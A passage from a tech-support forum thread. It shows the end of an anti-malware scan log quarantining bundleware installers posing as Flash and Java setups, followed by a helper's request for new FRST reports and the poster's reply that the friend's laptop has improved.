PUP.Optional.BundleInstaller, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_1895291026.EXE, Quarantined, [409], [483914],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (2).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (1).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (3).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (4).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648.EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_1463148242.EXE, Quarantined, [401], [482986],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (5).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.BundleInstaller, C:\USERS\MIRA KARANOVIć\DOWNLOADS\JAVASETUP_0351522482.EXE, Quarantined, [409], [517962],1.0.6535

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)

  • Joined: 26 Aug 2010
  • Posts: 10455
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

What is the state now?

Post me fresh FRST.txt and Addition.txt reports.

  • RJ
  • SuperModerator
  • Super-moderator of the military forums
  • Gavrilo Milentijević
  • Commander of the Gornje Polje police station
  • Joined: 12 Feb 2005
  • Posts: 7544
  • Location: the Oval Office

Unfortunately, I can't. I tried to sort this out because I spent a few days at my friend's place and saw that her laptop was almost dead.
The last thing I saw yesterday was that it had perked up a little.
I think the problem is more or less solved; in any case, thanks for the effort ;)
